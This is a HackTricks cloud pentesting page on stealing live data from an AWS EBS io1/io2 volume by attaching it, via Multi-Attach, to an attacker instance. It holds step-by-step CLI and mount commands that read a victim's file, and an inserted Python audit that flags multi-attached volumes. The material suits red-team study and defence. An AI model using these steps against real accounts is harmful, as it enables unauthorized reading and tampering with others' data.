AWS - Live Data Theft via EBS Multi-Attach
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
Abuse EBS Multi-Attach to read from a live io1/io2 data volume by attaching the same volume to an attacker-controlled instance in the same Availability Zone (AZ). Mounting the shared volume read-only gives immediate access to in-use files without creating snapshots.
Requirements
- Target volume: io1 or io2 created with --multi-attach-enabled, in the same AZ as the attacker instance.
- Permissions: ec2:AttachVolume, ec2:DescribeVolumes, ec2:DescribeInstances on the target volume/instances.
- Infrastructure: Nitro-based instance types that support Multi-Attach (C5/M5/R5 families, etc.).
Notes
- Mount read-only with -o ro,noload to reduce corruption risk and avoid journal replays.
- On Nitro instances the EBS NVMe device exposes a stable /dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_vol... path (helper below).
Prepare a Multi-Attach io2 volume and attach to victim
Example (create in us-east-1a and attach to the victim):
AZ=us-east-1a
# VICTIM_INSTANCE must already hold the victim's instance id (same AZ as the volume)
# Create io2 volume with Multi-Attach enabled
VOL_ID=$(aws ec2 create-volume \
--size 10 \
--volume-type io2 \
--iops 1000 \
--availability-zone "$AZ" \
--multi-attach-enabled \
--tag-specifications 'ResourceType=volume,Tags=[{Key=Name,Value=multi-shared}]' \
--query 'VolumeId' --output text)
# Attach to victim instance
aws ec2 attach-volume --volume-id "$VOL_ID" --instance-id "$VICTIM_INSTANCE" --device /dev/sdf
On the victim, format/mount the new volume and write sensitive data (illustrative):
VOLNOHYP="vol${VOL_ID#vol-}"
DEV="/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_${VOLNOHYP}"
sudo mkfs.ext4 -F "$DEV"
sudo mkdir -p /mnt/shared
sudo mount "$DEV" /mnt/shared
echo 'secret-token-ABC123' | sudo tee /mnt/shared/secret.txt
sudo sync
Attach the same volume to the attacker instance
aws ec2 attach-volume --volume-id $VOL_ID --instance-id $ATTACKER_INSTANCE --device /dev/sdf
Mount read-only on the attacker and read data
VOLNOHYP="vol${VOL_ID#vol-}"
DEV="/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_${VOLNOHYP}"
sudo mkdir -p /mnt/steal
sudo mount -o ro,noload "$DEV" /mnt/steal
sudo cat /mnt/steal/secret.txt
Expected result: the same VOL_ID shows multiple Attachments (victim and attacker) and the attacker can read files written by the victim without creating any snapshot.
aws ec2 describe-volumes --volume-ids $VOL_ID \
--query 'Volumes[0].Attachments[*].{InstanceId:InstanceId,State:State,Device:Device}'
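As an added defensive check that is not part of the original page, the following Python audits a describe-volumes response (the same data the command above queries) for Multi-Attach-capable volumes and for volumes attached to more than one instance, flagging any instance not on an allow-list; the sample response and every volume/instance id in it are constructed placeholders.

```python
# Constructed sample in the shape of an `aws ec2 describe-volumes` / boto3
# describe_volumes() response: one Multi-Attach io2 volume attached to two
# instances plus an ordinary gp3 volume. All ids are placeholders.
SAMPLE_DESCRIBE_VOLUMES = {"Volumes": [
    {"VolumeId": "vol-0aaaaaaaaaaaaaaaa", "VolumeType": "io2",
     "AvailabilityZone": "us-east-1a", "MultiAttachEnabled": True,
     "Attachments": [
         {"InstanceId": "i-0victim0000000001", "State": "attached", "Device": "/dev/sdf"},
         {"InstanceId": "i-0unknown000000002", "State": "attached", "Device": "/dev/sdf"},
     ]},
    {"VolumeId": "vol-0bbbbbbbbbbbbbbbb", "VolumeType": "gp3",
     "AvailabilityZone": "us-east-1a", "MultiAttachEnabled": False,
     "Attachments": [
         {"InstanceId": "i-0victim0000000001", "State": "attached", "Device": "/dev/xvda"},
     ]},
]}


def audit_multi_attach(response, allowed=None):
    """Flag Multi-Attach-capable volumes and any volume attached to >1 instance.
    allowed: optional {volume_id: set(instance_ids)} of instances meant to share
    a volume; any other instance on a shared volume is reported as unexpected.
    """
    allowed = allowed or {}
    findings = []
    for vol in response.get("Volumes", []):
        # Only live or in-progress attachments count; detached entries are noise.
        instances = {a["InstanceId"] for a in vol.get("Attachments", [])
                     if a.get("State") in ("attached", "attaching")}
        multi = bool(vol.get("MultiAttachEnabled"))
        if not multi and len(instances) < 2:
            continue  # ordinary single-attach volume, nothing to report
        findings.append({
            "VolumeId": vol["VolumeId"],
            "MultiAttachEnabled": multi,
            "AttachedInstances": sorted(instances),
            "UnexpectedInstances": sorted(instances - allowed.get(vol["VolumeId"], set())),
            # A capable-but-single-attached volume is a latent risk; >1 is live sharing.
            "Severity": "high" if len(instances) > 1 else "info",
        })
    return findings


if __name__ == "__main__":
    for f in audit_multi_attach(SAMPLE_DESCRIBE_VOLUMES, {"vol-0aaaaaaaaaaaaaaaa": {"i-0victim0000000001"}}):
        print(f)
```

In a real account, feed it the full `aws ec2 describe-volumes` JSON per region and alert on any "high" finding whose UnexpectedInstances list is non-empty.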
Helper: find the NVMe device path by Volume ID
On Nitro instances, use the stable by-id path that embeds the volume id (drop the dash after vol):
VOLNOHYP="vol${VOL_ID#vol-}"
ls -l /dev/disk/by-id/ | grep "$VOLNOHYP"
# -> nvme-Amazon_Elastic_Block_Store_volXXXXXXXX...
Impact
- Immediate read access to live data on the target EBS volume without generating snapshots.
- If mounted read-write the attacker can tamper with the victim filesystem (risk of corruption).